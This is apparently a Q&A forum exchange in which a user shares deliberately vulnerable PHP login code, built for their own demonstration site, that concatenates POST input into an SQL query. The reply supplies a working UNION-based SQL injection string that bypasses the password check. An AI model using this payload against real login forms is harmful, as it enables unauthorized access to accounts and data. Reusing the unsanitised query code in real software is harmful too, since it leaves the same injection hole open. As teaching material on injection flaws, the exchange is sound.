I am trying to do a sql injection on a site set up by me on php to go to demonstrate the vulnerabilities of the site. The goal is to pass the form without entering the password, it would be even better to pass the form without even having to enter the username. this is the code that manages the login to the reserved area, I have tried in several ways to enter but with poor results
<?php
$link = @mysqli_connect("localhost", "root", "", "ISdbs");
if (mysqli_connect_errno()) {
echo "Connessione fallita: " . die(mysqli_connect_error());
}
$query = "SELECT username,password from utenti where username='" . $_POST['user'] . "';";
echo "Ho eseguito la seguente query <b>",$query,"</b>";
$result = @mysqli_query($link, $query);
if (@mysqli_num_rows($result) != 0) {
while ($row = mysqli_fetch_array($result, MYSQLI_ASSOC)) {
if ($row['password'] == $_POST['pass']) {
$ID = $_POST['user'];
echo "<h1 align='center' >benvenuto nell'area riservata</h1>";
echo "<p align='center'>cosa vuoi fare?</p>";
echo "<div'><ul'>
<li><a href='eliminaUtente.php?id=$ID'>Eliminare l'utente</a></li>
<li><a href='visualizzaCF.php?id=$ID'>Visualizza i tuoi dati segreti</a></li>
</ul></div>";
}
else
echo "<h1>username o password errati</h1>";
}
}
else
echo "<h1>username o password errati</h1>";
?>
the sql tables have 7 fields (CF, name, surname, phone, address, username, password), but only username and password are used on the login process.
If the goal is to reach the h1 line in your code you need to post the following username:
' union all select username, '' from utenti where '' = '
This will produce the following sql (after formatting):
select username, password from utenti where username = ''
union all
select username, '' from utenti where '' = '';
This will return ALL rows from the table and the password column will contain blank strings. That should satisfy the $row['password'] == $_POST['pass'] check and you super secret code will be executed without someone knowing any password.